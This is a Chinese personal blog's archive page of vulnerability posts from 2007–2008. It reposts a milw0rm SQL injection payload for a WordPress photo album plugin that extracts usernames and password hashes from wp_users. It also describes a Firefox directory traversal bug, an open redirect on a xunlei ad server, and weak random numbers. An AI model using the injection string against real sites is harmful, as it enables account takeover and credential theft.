Archive

Archive for the ‘漏洞’ Category

Wordpress Photo album Remote SQL Injection Vulnerability

February 18th, 2008

EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOİT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#
建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字

wordpress支持, 漏洞 , , , , , ,

Firefox 2.0.0.12暴目录穿越(directory traversal)漏洞

February 11th, 2008

Firefox 2.0.0.12默认设置存在严重漏洞,预计2.0.0.13将会很快推出。是目录穿越(directory traversal)漏洞,攻击者可以使用view-source机制查看所有Firefox的参数设置,或是Firefox安装目录下的所有文件,不需要任何强制设置或插件帮助。比如“resource:///”默认会直接定位到“file:///C:/Program Files/Mozilla Firefox/”。

漏洞 , , ,

恶搞feedsky域名绑定(feedsky的一个小bug)

January 29th, 2008

feedsky的域名绑定貌似更换好几天啦,这次去更改下域名解析,发现feedsky的一小bug

看图:

feedsky域名绑定没有过滤域名而是只检查啦域名解析的真实性

feedsky绑定的结果:

来看看feedsky绑定的结果

可喜的是并没有对其他用户造成什么影响,呵呵:)

我现在还改回来,以免以后还要去改!!,也欢迎来订阅我的Rss

今日一点, 漏洞 , , , ,

很显然pplive的广告业务中有跨站漏洞(迅雷:cknum.xunlei.com)

January 4th, 2008

http://cknum.xunlei.com/fcg-bin/cgi_banner_stat.fcg?url=http://wz.mygogou.com/直接打开这个链接就会转到本博客。

这个(cknum.xunlei.com)是pplive的一个广告服务器(频道)。

还不清楚pplive和迅雷是不是只是广告上的合作。

pplive的广告服务器地址有:

cknum.xunlei.com

cop.my.xunlei.com
biz5.sandai.net
pt.cga.com.cn
pp.pplive.com

互联网, 安全, 漏洞 , , ,

E2手机病毒?

December 16th, 2007

漫不经心的打开主菜单,天!竞只剩固定拨号,神州行,,几个图标!我的第一感觉就是中病毒啦?不太可能吧!一个小小的e2?难到是昨晚电用完时的非法关机。试着关机开机几遍都没作用。奇怪啦,快捷键都能用(可以重新设置,只能看见应用程序,看不见系统设置类的菜单!),就是从主菜单没法找到!,最后终于在侧面语音功能中找到”复位”菜单,只有删除全部的复位功能把主菜单找回来啦,感谢ing,不过代价是短信,通信录等手机上存的资料统统丢失,内存卡上的软件要重新下过用设置依然。
明白啦e2安全密码是在手机复位时用到和锁定密码不同!

今日一点, 安全, 推荐,内容, 漏洞 , , , ,

什么是随机数漏洞,什么是脆弱的随机数

November 28th, 2007

电脑在没有用户参与的情况不能产生真正的随机数。

脆弱的随机数(随机数漏洞)只有在程序使用普通的方式产生随机数出现,主要有以下两种情况产生:
1,本来就不是随机数
2,这个产生的随机数是可以预测的,或可以通过某种途径预测到的

如果创造良好的随机数,电脑必须有达到两个条件:
1,一个良好的随机数生成算法
2,随机数生成算法有一个随机的和不可预测随机数种子

脆弱性随机数的例子 Read more…

技术分析, 漏洞 ,